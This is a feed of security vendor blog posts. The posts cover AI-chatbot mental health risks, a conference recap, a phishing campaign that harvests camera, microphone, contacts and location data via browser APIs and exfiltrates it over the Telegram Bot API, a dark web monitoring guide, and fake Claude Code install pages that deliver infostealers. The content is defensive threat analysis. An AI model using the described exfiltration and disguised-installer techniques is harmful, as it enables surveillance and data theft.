Similarly, in August 2025, the parents of 16-year-old Adam Raine filed a suit against OpenAI, alleging that ChatGPT helped their son draft a suicide note and advised him against seeking help from adults.

By OpenAI’s own estimates, approximately 0.07% of weekly ChatGPT users exhibit signs of psychosis or mania, while 0.15% engage in conversations showing clear suicidal intent. Notably, that same percentage of users (0.15%) displays an elevated level of emotional attachment to the AI. While these appear to be negligible fractions of a percent, across 800 million users it represents nearly three million people experiencing some form of behavioral disturbance. Furthermore, the U.S. Federal Trade Commission has received 200 complaints regarding ChatGPT since its launch, some describing the development of delusions, paranoia, and spiritual crises.

While a diagnosis of “AI psychosis” has not yet received a clinical classification of its own, doctors are already using the term to describe patients presenting with hallucinations, disorganized thinking, and persistent delusional beliefs developed through intensive chatbot interaction. The greatest risks emerge when a bot is utilized not as a tool, but as a substitute for real-world social connection or professional psychological help.

How to keep yourself and your loved ones safe

Of course, none of this is a reason to abandon AI entirely; you simply need to know how to use it. We recommend adhering to these fundamental principles:

  • Do not use AI as a psychologist or emotional crutch. Chatbots are not a replacement for human beings. If you’re struggling, reach out to friends, family, or a mental health hotline. A chatbot will agree with you and mirror your mood — this is a design feature, not true empathy. Several U.S. states have already restricted the use of AI as a standalone therapist.
  • Opt for text over voice when discussing sensitive topics. Voice interfaces with affective dialogue create an illusion of speaking with a living person, and tend to suppress critical thinking. If you use voice mode, remain conscious of the fact that you’re speaking to an algorithm, not a friend.
  • Limit your time interacting with AI. Two thousand pages of transcripts in two months represent nearly continuous interaction. Set a timer for yourself. If chatting with a bot begins to displace real-world connections, it’s time to step back into reality.
  • Do not share personal information with AI assistants. Avoid entering passport or social security numbers, bank card details, exact addresses, or intimate personal secrets into chatbots. Everything you write can be saved in logs and used for model training — and in some cases, may become accessible to third parties.
  • Evaluate all AI output critically. Neural networks hallucinate — they generate plausible but false information and can skillfully blend lies with truth, such as citing real addresses within the context of a completely fabricated story. Always fact-check through independent sources.
  • Watch over your loved ones. If a family member begins spending hours talking to AI, becomes withdrawn, or voices strange ideas about machine consciousness or conspiracies, it’s time for a delicate but serious conversation. To manage children’s screen time, use parental control tools like Kaspersky Safe Kids, which comes as part of comprehensive family protection solution Kaspersky Premium, along with the built-in safety filters of AI platforms.
  • Configure your safety settings. Most AI platforms allow you to disable chat history, limit data collection, and enable content filters. Spend ten minutes configuring your AI assistant’s privacy settings; while this won’t stop AI hallucinations, it will significantly reduce the likelihood of your personal data leaking. Our detailed privacy setup guides for ChatGPT and DeepSeek can help you with that.
  • Remember the bottom line: AI is a tool, not a sentient being. No matter how realistic the chatbot’s voice sounds or how understanding the response may seem, what lies beneath is an algorithm predicting the most probable next word. It has no consciousness, no intentions, no feelings.

Further reading to better understand the nuances of safe AI usage:

Kaspersky official blog – ​Read More

ANY.RUN at RootedCON 2026: Meeting Security Teams and Showcasing New Capabilities 

From March 5 to March 7, the ANY.RUN team attended RootedCON 2026 in Madrid and showcase some of our latest capabilities developed for modern SOC environments at the conference expo. 

The event provided a great opportunity to meet our existing clients and connect with security teams exploring advanced threat detection solutions. 

Meeting the Community and Partners 

RootedCON is one of the largest cybersecurity conferences in Europe, bringing together thousands of security researchers, SOC analysts, and industry professionals every year. 

For us, it was a great chance to meet many of our users face-to-face, hear how SOC teams integrate ANY.RUN’s solutions into their investigation workflows, and exchange ideas with practitioners working on real-world threats every day.  

Meeting clients at RootedCON 2026
It was a pleasure to meet so many of our clients

It was great to connect with so many of our customers and discuss how they use our threat analysis and intelligence in their daily security operations. 

ANY.RUN swag
We also brought ANY.RUN swag, which didn’t stay at the booth for long 

We also had the pleasure of meeting many new companies and potential partners who were exploring ways to strengthen their threat detection and analysis workflows. Conversations like these are always valuable, they help us better understand how security teams operate and what challenges they face in modern SOC environments. 

Demonstrating New Capabilities and Exclusives 

At the booth, visitors were able to see both existing ANY.RUN solutions and several new capabilities that expand our products’ visibility and detection power. Some of these updates were shown publicly for the first time. 

RootedCON visitors were among the first to see ANY.RUN’s newest capabilities 
RootedCON visitors were among the first to see ANY.RUN’s newest capabilities 

One of the new technologies we demonstrated was automatic SSL decryption in the Interactive Sandbox.  

As phishing infrastructure increasingly relies on encrypted HTTPS traffic, many malicious actions can appear as normal web activity.  

By automatically extracting session keys from process memory and decrypting traffic internally during analysis, the sandbox provides full visibility into encrypted sessions and helps security teams increase the phishing detection rate and drive down the MTTR

Improve SOC detection
and investigation speed
Reveal threats faster with behavior-based evidence



Power up your SOC


And that’s just one example of how ANY.RUN continues to evolve. More capabilities are already in development to further strengthen threat detection, investigation workflows, and cross-platform visibility for modern SOC teams. 

See You Next Year 

We’re grateful to everyone who stopped by the ANY.RUN booth to talk with the team, share feedback, or simply say hello. Events like RootedCON are always a great reminder of how strong and collaborative the cybersecurity community is. 

We’re already looking forward to returning next year. 

About ANY.RUN 

ANY.RUN provides interactive malware analysis and actionable threat intelligence used by more than 15,000 organizations and 600,000 security professionals worldwide.  

The combined solution stack that includes the Interactive SandboxThreat Intelligence Lookup, and Threat Intelligence Feeds helps SOC and MSSP teams analyze threats faster, investigate incidents with deeper context, and detect emerging attacks earlier.  

ANY.RUN also meets enterprise security and compliance expectations. The company is SOC 2 Type II certified, reinforcing its commitment to protecting customer data and maintaining strong security controls. 

The post ANY.RUN at RootedCON 2026: Meeting Security Teams and Showcasing New Capabilities  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

AI-Assisted Phishing Campaign Exploits Browser Permissions to Capture Victim Data

AI-Assisted

Executive Summary

Cyble Research & Intelligence Labs (CRIL) has identified a widespread, highly active social engineering campaign hosted primarily on edgeone.app infrastructure.

The initial access vectors are diverse — ranging from “ID Scanner,” and “Telegram ID Freezing,” to “Health Fund AI”—to trick users into granting browser-level hardware permissions such as camera and microphone access under the pretext of verification or service recovery.

Upon gaining permissions, the underlying JavaScript workflow attempts to capture live images, video recordings, microphone audio, device information, contact details, and approximate geographic location from affected devices. This data is subsequently transmitted to attacker-controlled infrastructure, enabling operators to obtain Personally Identifiable Information (PII) and contextually sensitive information. 

Further analysis revealed indicators of potential AI-assisted code generation, including structured annotations and emoji-based message formatting embedded within the operational logic. These characteristics reflect a growing trend where threat actors leverage generative AI tools to accelerate the development of phishing frameworks.

The breadth of data collected in this campaign extends beyond traditional credential phishing and raises significant security concerns. Harvested multimedia and device telemetry could be leveraged for identity theft, targeted social engineering, account compromise attempts, or extortion, posing risks to both individuals and organizations. (Figure 1)

Figure 1 – Malicious Web Interfaces Used for Data Collection, AI-Assisted
Figure 1 – Malicious Web Interfaces Used for Data Collection

Key Takeaways

  • Infrastructure: Extensive use of edgeone.app (EdgeOne Pages) for hosting low-cost, scalable, and highly available phishing landing pages.
  • Biometric Harvesting: The operation abuses legitimate browser APIs to access cameras, microphones, and device information after user consent.
  • C2 Mechanism: Utilization of the Telegram Bot API (api.telegram.org) as a streamlined C2 and data exfiltration channel.
  • Diverse Lures: Attackers rotate lures, including “ID Scanner” and “Health Fund AI”, to target various demographics and bypass regional security filters.
  • The phishing pages impersonate popular platforms and services, including TikTok, Telegram, Instagram, Chrome/Google Drive, and game-themed lures such as Flappy Bird, to increase victim trust.
  • Once interaction occurs, the campaign attempts to collect multiple forms of sensitive data, including photographs, video recordings, microphone audio, device information, contact details, and approximate geographic location.

Overview

  • Campaign Start: Observed since early 2026
  • Primary Objective: Harvesting victim multimedia data and device information
  • Primary Infrastructure: edgeone.app (multiple subdomains)
  • Impersonated Brands: TikTok, Telegram, Instagram, Chrome/Google Drive, Flappy Bird
  • Key Behavior: Browser permission prompts used to capture camera images, record audio/video, enumerate device metadata, retrieve geolocation information, and attempt contact list access through browser APIs.

The campaign operates as a web-based phishing framework that captures photographs directly from victims’ devices. The infrastructure hosts multiple phishing templates that impersonate verification systems or service recovery portals. The goal is to socially engineer users into granting browser permission for camera access.

Unlike traditional credential phishing pages, these pages do not primarily collect typed input. Instead, they rely on browser hardware permissions, requesting access to the device’s camera. Once permission is granted, the page silently captures a frame from the live video stream and exfiltrates it.

The use of Telegram as a data collection mechanism indicates that the operators prioritize low operational complexity and immediate access to stolen data. Since Telegram bots can receive file uploads through simple HTTP requests, attackers can directly integrate the API into client-side scripts.

Business Impact and Potential Abuse

The data collected through this campaign provides attackers with multiple forms of sensitive personal information and contextual intelligence, thereby significantly increasing the effectiveness of follow-on attacks.

One potential abuse scenario involves identity fraud and account recovery manipulation. The campaign captures victim photographs, video recordings, and audio samples that could be used to bypass identity verification workflows used by financial platforms, social media services, or other online services that rely on biometric or video-based verification.

Additionally, the collection of device information, location data, and contact details allows attackers to build detailed victim profiles. This information may be used to perform targeted social engineering attacks, impersonate victims in communication platforms, or craft convincing fraud attempts against their contacts.

Another concerning use case involves extortion and intimidation. Because the campaign captures multimedia data, such as camera images, video recordings, and microphone audio, attackers may pressure victims by threatening to expose the collected material unless a payment is made.

For organizations, the broader business impact includes:

  • Increased risk of identity theft and account takeover attempts
  • Potential abuse of stolen biometric and multimedia data in fraud schemes
  • Targeted phishing or fraud campaigns against employees and customers
  • Reputational damage if impersonated brand identities are used in malicious campaigns

The campaign’s ability to collect multiple categories of sensitive information from a single interaction significantly amplifies the risk to both individuals and businesses.

Why does this matter?

This campaign marks a significant evolution in phishing operations, shifting from credential theft to harvesting biometric and device-level data. By abusing browser permissions to capture victims’ live images, audio, and contextual device information, threat actors can obtain high-quality identity data that is difficult to revoke or replace.

The stolen data can be leveraged to bypass video-KYC and remote identity verification processes, enabling fraudulent account creation, synthetic identity fraud, account takeover, and financial scams across banking, fintech, telecom, and digital service platforms. Additionally, high-resolution facial images and audio samples may be weaponized for AI-driven impersonation and deepfake attacks, increasing the effectiveness of business email compromise and targeted social engineering campaigns.

For organizations, the campaign introduces elevated risks, including financial losses, regulatory non-compliance, AML exposure, reputational damage, and erosion of trust in digital onboarding systems, highlighting the growing need for stronger verification controls and browser-permission abuse detection.

Technical Analysis

The infection chain, as outlined in Figure 2, shows the stages of the attack.

Figure 2: Campaign Overview
Figure 2: Campaign Overview

Phishing Page Behaviour

The phishing page contains embedded JavaScript that leverages browser media APIs to access the victim’s device camera after obtaining user permission. Once access is granted, the script initializes a live video stream and processes its frames.

A capture function then renders a frame from the video feed onto an HTML5 canvas using ctx.drawImage(), effectively converting the live camera input into a static image. (see Figure 3)

The canvas content is subsequently encoded into a JPEG blob via canvas.toBlob(), creating a binary image object that can be transmitted through HTTP requests to attacker-controlled infrastructure.

Figure 3 – JavaScript Implementation Used for Browser-Based Photo Capture
Figure 3 – JavaScript Implementation Used for Browser-Based Photo Capture

Expanded Data Collection Capabilities

Analysis of the campaign script indicates that the phishing framework performs extensive device fingerprinting and environment enumeration before initiating camera-based verification workflows.

The script collects system metadata using the following browser APIs

  • navigator.userAgent
  • navigator.platform
  • navigator.deviceMemory
  • navigator.hardwareConcurrency
  • navigator.connection
  • navigator.getBattery

This allows the attacker to gather detailed information such as operating system type and version, device model indicators, screen resolution and orientation, browser version, available RAM, CPU core count, network type, battery level, and language settings.

Figure 4 – Script Fetching Victim IP and Geolocation via External APIs
Figure 4 – Script Fetching Victim IP and Geolocation via External APIs

Additionally, the script retrieves the victim’s public IP address using services such as api.ipify.org, then enriches the geolocation using ipapi.co, enabling the collection of country, city, latitude, and longitude data. (see Figure 4)

This telemetry is aggregated and transmitted to the attacker via the Telegram Bot API, providing operators with contextual information about the victim’s device and location prior to further data harvesting.

Figure 5 – Audio Recording Logic Used to Capture Victim Microphone Input
Figure 5 – Audio Recording Logic Used to Capture Victim Microphone Input

Beyond system profiling, the script implements multiple routines for collecting multimedia and personal data via browser permission prompts. The campaign captures several still images from both the front-facing and rear-facing cameras, records short video clips using the MediaRecorder API, and performs microphone recordings.

These recordings are packaged as JPEG, WebM video, or WebM audio files and exfiltrated via Telegram API methods such as sendPhoto, sendVideo, and sendAudio. (see Figure 5)

Figure 6 – Code Requesting Access to Victim Contacts via the Contacts API

Additionally, the script attempts to access the victim’s contact list through the Contacts Picker API (navigator.contacts.select), requesting attributes such as contact names, phone numbers, and email addresses. If granted, the selected contacts are formatted into structured messages and transmitted to the attacker. (see Figure 6)

User Interface Manipulation

The phishing pages include interface elements designed to convince victims that the image capture process is legitimate.

For example, status messages displayed during execution may include:

  • “Capturing photo”
  • “Sending to server”
  • “Photo sent successfully”

These messages simulate the behavior of legitimate identity verification platforms and help maintain the illusion that the process is part of a valid verification workflow.

Once the image is successfully transmitted, the script terminates the camera stream and resets the interface after a short delay.

Infrastructure Observations

Analysis of the campaign revealed that the phishing pages are primarily hosted under the edgeone.app domain. Multiple variations of phishing pages were observed using similar JavaScript logic and workflow patterns.

The consistent use of the same infrastructure suggests that attackers may be operating a templated phishing kit capable of generating different themed pages while maintaining the same underlying data-collection logic.

Because the image exfiltration occurs through Telegram infrastructure, the phishing pages themselves do not require backend servers, simplifying deployment and enabling rapid rotation of phishing URLs.

Indicators of Potential Generative AI Use in Script Development

During analysis of the phishing framework, researchers observed the use of emojis embedded directly within the script’s message formatting logic. These emojis appear in structured status messages that are assembled and transmitted during the data collection workflow. The use of decorative Unicode symbols within operational code is uncommon in manually written malicious scripts but has increasingly been observed in campaigns that use generative AI tools during development. (see Figure 7)

Figure 7 – Script Fragment Suggesting AI-Assisted Development
Figure 7 – Script Fragment Suggesting AI-Assisted Development

Targeted Countries and Impersonated Brands

During infrastructure monitoring and phishing URL telemetry analysis, the campaign’s infrastructure appears to be globally accessible. Analysis of the phishing templates used in this campaign reveals that the operators impersonate a range of widely recognized consumer platforms and applications. Observed brand impersonation themes include:

Impersonated Brand Observed Theme
TikTok Free followers/engagement rewards
Flappy Bird Game reward or verification workflows
Telegram Account freezing or verification alerts
Instagram Account recovery or follower reward systems
Google Chrome / Google Drive Security verification prompts

Conclusion

Our deep-dive analysis revealed a sophisticated phishing campaign that extends beyond traditional credential theft by harvesting multimedia and device-level data through browser permission abuse.

The campaign attempts to collect photographs, video recordings, audio recordings from microphones, contact details, device information, and approximate location data directly from victims. This operation demonstrates a growing trend where attackers leverage client-side scripting and legitimate web services to collect and transmit sensitive data without relying on traditional command-and-control infrastructure.

Indicators in the script also suggest AI-assisted development, reflecting how threat actors may be using generative AI tools to accelerate the creation of phishing frameworks.

The breadth of information collected increases the potential for identity theft, targeted social engineering, account compromise attempts, and extortion. Organizations should remain cautious about phishing pages that request hardware permissions, such as camera, microphone, or contact access, particularly when originating from untrusted domains.

Cyble’s Threat Intelligence Platforms continuously monitor emerging threats, attacker infrastructure, and malware activity across the dark webdeep web, and open sources. This proactive intelligence empowers organizations with early detection, brand and domain protection, infrastructure mapping, and attribution insights. Altogether, these capabilities provide a critical head start in mitigating and responding to evolving cyber threats.

Our Recommendations

We have listed some essential cybersecurity best practices that serve as the first line of defense against attackers. We recommend that our readers follow the best practices given below:

  • Restrict camera permissions for unknown websites
  • Monitor outbound traffic to api.telegram.org when originating from browser sessions
  • Deploy browser security extensions capable of identifying phishing pages
  • Implement domain monitoring for suspicious infrastructure hosting phishing kits

MITRE ATT&CK® Techniques

Tactic Technique ID Procedure
Initial Access T1566 – Phishing Phishing pages used to lure victims to malicious verification workflows.
Execution T1059.007 – JavaScript Malicious JavaScript executed in the victim’s browser.
Collection T1125 – Video Capture Camera access is used to capture photos and videos of victims.
Collection T1123 – Audio Capture Microphone access is used to record the victim’s audio.
Collection T1005 – Data from Local System Device information is collected from the browser environment.
Collection T1213 – Data from Information Repositories Contact details retrieved from the device contact list.
Discovery T1082 – System Information Discovery Device and browser information enumeration.
Discovery T1614 – System Location Discovery Victim IP and geographic location collected.
Exfiltration T1567 – Exfiltration Over Web Services Collected data transmitted to the attacker’s infrastructure.

Indicators of Compromise (IOCs)

The IOCs have been added to this GitHub repository. Please review and integrate them into your Threat Intelligence feed to enhance protection and improve your overall security posture.

The post AI-Assisted Phishing Campaign Exploits Browser Permissions to Capture Victim Data appeared first on Cyble.

Cyble – ​Read More

Face value: What it takes to fool facial recognition

ESET’s Jake Moore used smart glasses, deepfakes and face swaps to ‘hack’ widely-used facial recognition systems – and he’ll demo it all at RSAC 2026

WeLiveSecurity – ​Read More

The Ultimate Guide to Dark Web Monitoring in 2026: Protect Your Data Before Attackers Strike

Dark web intelligence

In 2026, the cyber threat landscape has become more complex and dangerous than ever. Attackers no longer operate only on the surface web; they now lurk in encrypted networks, underground marketplaces, and anonymous forums across the dark web, where stolen credentials are traded, breaches are planned, and cyberattacks take shape. 

Recent data from Cyble Research and Intelligence Labs (CRIL) shows the scale of this threat. In 2025 alone, Cyble tracked 6,046 global data breach and leak incidents, with sectors such as government and finance among the most targeted. The research has also identified thousands of enterprise credentials circulating on dark web marketplaces, often harvested by infostealer malware and sold to cybercriminals. 

For organizations that want to protect sensitive data, maintain reputation, and reduce operational risk, investing in dark web intelligence and dark web monitoring solutions is no longer optional; it’s a necessity. 

What Is Dark Web Monitoring and Why It Matters in 2026 

Dark web monitoring involves continuous scanning and intelligence gathering from hidden parts of the internet that aren’t indexed by traditional search engines, including TOR, I2P, ZeroNet, and encrypted chat channels. Cybercriminals use these platforms to trade stolen data, discuss exploits, and plan attacks. 

Effective dark web surveillance allows organizations to detect threats early. By identifying stolen credentials, leaked data, and malicious activity before the attacker acts, security teams can reset passwords, notify affected personnel, and fortify defenses, turning reactive security into a proactive advantage. 

How the Dark Web Has Evolved as a Threat Landscape 

Once considered a fringe network, the dark web has become a structured ecosystem for cybercrime. Threat actors collaborate globally with the same levels of sophistication as legitimate enterprises, complete with forums for selling vulnerabilities, reputation systems for traders, and encrypted channels for planning attacks. 

From ransomware kits to stolen databases and insider trading in sensitive corporate data, the dark web now functions as a hub for criminal collaboration and the commercialization of cyberattacks. Organizations that ignore this underground economy risk being blindsided. 

What Kind of Data Ends Up on the Dark Web 

Not all information on the dark web carries the same risk, but much of it is highly sensitive: 

  • Stolen credentials: Email/password combinations, VPN logins 

  • Breached corporate databases: Financial, HR, and client information 

  • Identity documents: Social Security numbers, passports 

  • Internal communications or proprietary IP 

Even seemingly minor leaks, if unnoticed, can be exploited for data breaches. Platforms with data leak monitoring and dark web alerts allow teams to act before these threats escalate. 

How Dark Web Monitoring Works 

Modern dark web monitoring relies on a combination of automated technologies and expert analysis. Tools crawl hidden networks, marketplaces, paste sites, and private forums to collect data. AI and machine learning analyze signals, identify patterns of malicious behavior, and provide cyber threat intelligence in actionable formats. 

Key capabilities include: 

  • Deep web and dark web scanning: Covering TOR, I2P, and other hidden networks 

  • Threat actor tracking: Linking chatter to known malicious entities 

  • Natural Language Processing (NLP): Interpreting unstructured forum text 

  • Actionable alerts: Prioritized intelligence for immediate response 

This ensures organizations can anticipate threats rather than merely respond after an incident. 

Key Features to Look for in a Dark Web Monitoring Solution 

In 2026, an effective platform should offer: 

  • Continuous, real-time scanning 

  • Comprehensive monitoring of marketplaces, forums, and paste sites 

  • Automated alerts with remediation guidance 

  • Integration with existing cybersecurity systems 

  • Reporting for compliance and risk assessment 

  • Threat actor profiling and predictive analytics 

Solutions lacking contextual intelligence or actionable insights are insufficient for modern threat landscapes. 

Cyble Hawk for Advanced Threat Intelligence and Protection 

To counter cyber threats from advanced adversaries, Cyble Hawk represents the next generation of dark web monitoring and threat intelligence. Beyond merely detecting leaks, Cyble Hawk tracks threat actors, uncovers emerging attack trends, and provides actionable insights across cyber and physical domains. 

Key advantages of Cyble Hawk include: 

  • Deep Intelligence Fusion: Integrates open-source and proprietary intelligence for a 360-degree view of threats. 

  • AI & Deep Learning: Identifies threat actors and patterns in real time. 

  • Real-Time Alerts & Rapid Response: Immediate notifications for compromised credentials, breaches, and vulnerabilities. 

  • Incident Response & Resilience: Supports frameworks to continuously strengthen the cybersecurity posture. 

Cyble Hawk doesn’t just monitor; it empowers organizations to detect, respond, and protect against the most advanced cyber threats before they escalate. 

Dark Web Monitoring Across Industries 

Different sectors face unique exposures, and tailored monitoring is critical: 

  • Financial Services: Detect compromised customer databases, prevent fraud schemes 

  • Healthcare: Identify patient data leaks, PHI exposure, and ransomware chatter 

  • Retail & E-Commerce: Monitor credential-stuffing lists, card dumps, and phishing campaigns 

  • Manufacturing & Critical Infrastructure: Track trade-secret exposure and APT activity 

  • Government & Public Sector: Detect contractor data leaks, APT campaigns, and impersonation threats 

Building a Dark Web Monitoring Strategy in 2026 

A robust strategy combines continuous monitoring with proactive response: 

  1. Asset Prioritization: Identify the most critical data, accounts, and intellectual property 

  1. Continuous Intelligence Gathering: Real-time scanning of forums, marketplaces, and paste sites 

  1. Automated, Actionable Alerts: Ensure teams can respond quickly to compromised assets 

  1. Integration with Cybersecurity Infrastructure: Link dark web intelligence with firewalls, identity protection, and incident response tools 

  1. Employee Awareness: Educate staff to recognize phishing and social engineering attempts 

This approach transforms dark web intelligence into a defensive advantage, reducing exposure and operational risk. 

Frequently Asked Questions (FAQs) 

Q.1: What is dark web intelligence? 

Intelligence is collected from unindexed networks and underground forums to detect threats, leaked data, or compromised credentials. 

Q.2: Can dark web monitoring prevent attacks? 

It doesn’t prevent breaches outright, but early detection of leaks or malicious activity enables mitigation before exploitation. 

Q.3: Who should use dark web monitoring? 

Any organization handling sensitive data, including enterprises, government agencies, and financial institutions. 

Q.4: How does Cyble Hawk enhance monitoring? 

By combining AI, threat actor tracking, and real-time alerts, Cyble Hawk delivers actionable intelligence that allows organizations to detect, respond, and fortify defenses effectively. 

Conclusion 

In 2026, the dark web remains one of the most dynamic and high-risk areas of the cyber threat landscape. Organizations can no longer afford to rely on reactive security. By leveraging advanced monitoring platforms like Cyble Hawk, security teams gain early visibility into compromised data, track threat actors, and respond to risks before they escalate into major incidents. 

Cyble Hawk combines AI-driven intelligence, real-time alerts, and expert threat analysis to help organizations detect threats faster and strengthen their cybersecurity posture. Schedule a personalized demo to see Cyble Hawk in action and learn how it can help protect your organization’s critical assets. 

The post The Ultimate Guide to Dark Web Monitoring in 2026: Protect Your Data Before Attackers Strike appeared first on Cyble.

Cyble – ​Read More

Cyber fallout from the Iran war: What to have on your radar

The cybersecurity implications of the war in the Middle East extend far beyond the region. Here’s where to focus your defenses.

WeLiveSecurity – ​Read More

AMOS and Amatera disguised as AI agents | Kaspersky official blog

We recently discussed how malicious actors are spreading the AMOS infostealer for macOS via Google Ads, leveraging a chat with an AI assistant on the actual OpenAI website to host malicious instructions. We decided to dig a little deeper, only to discover several similar malicious campaigns where attackers attempt to slip users malware disguised as popular AI tools through Google Search ads. If the victims are searching for macOS-specific tools, the payload deployed is the very same AMOS; if they’re on Windows, it’s the Amatera infostealer instead. These campaigns use the popular Chinese AI Doubao, the viral AI assistant OpenClaw, or the coding assistant Claude Code as bait. This means such campaigns pose a threat not only to home users but also to organizations.

The reality is that corporate employees are increasingly using coding assistants like Claude Code, and workflow automation agents like OpenClaw. This brings its own set of risks, which is why many organizations have yet to officially approve (or pay for) access to such tools. Consequently, some employees take matters into their own hands to find these trendy tools, and head straight to Google. They type in a search query and are served a sponsored link leading to a malicious installation guide. Let’s take a closer look at how this attack plays out, using a Claude Code distribution campaign discovered in early March as an example.

The search query

So, a user starts looking for a place to download the Anthropic agent and types something like “Claude Code download” into the search bar. The search engine returns a list of links, with “sponsored links” (paid advertisements) sitting at the top. One of these ads leads the user to a malicious page featuring fake documentation. Interestingly, the site itself is built on Squarespace, a legitimate website builder that helps it bypass anti-phishing filters.

Search result examples

Search results with ads in Romania and Brazil

The attackers’ site meticulously mimics the original Claude Code documentation, complete with installation instructions. Just like the real deal, it prompts the user to copy and run a command. However, once executed, it installs not an AI agent but malware. Essentially, this is just another flavor of the ClickFix attack — one that has earned its own nickname: InstallFix.

Malicious website

Malicious site mimicking installation instructions

Claude Code website

Genuine Claude Code site with installation instructions

Malicious payload

Just like with the original Claude Code, the command for macOS attempts to install an application using the curl command-line utility. In reality, it deploys the AMOS spyware — previously described by our experts on Securelist — which was used in a similar past campaign.

In the case of Windows, the malware is installed using the system utility mshta.exe, which executes HTML-based applications instead of curl, which is used for the genuine Claude Code. This utility deploys the Amatera infostealer, which harvests browser data, crypto-wallet info, as well as information from the user folder, and sends it to a remote server at 144{.}124.235.102.

How to keep your company safe

Interest in AI agents continues to grow, and the emergence of new tools and their rising popularity are creating fresh attack vectors. Specifically, attempting to seek out third-party AI tools can not only jeopardize the source code of projects on the victim’s computer but also lead to the compromise of secrets, confidential corporate files, and user accounts.

To prevent this from happening, the first step should be educating employees about these dangers and the tricks used by threat actors. This can be done using our training platform: Kaspersky Automated Security Awareness. Incidentally, it includes a specialized lesson on the use of AI in corporate environments.

Additionally, we recommend protecting all corporate devices with proven cybersecurity solutions.

We also suggest checking out our previously published article on three approaches to minimizing the risks of using shadow AI.

Kaspersky official blog – ​Read More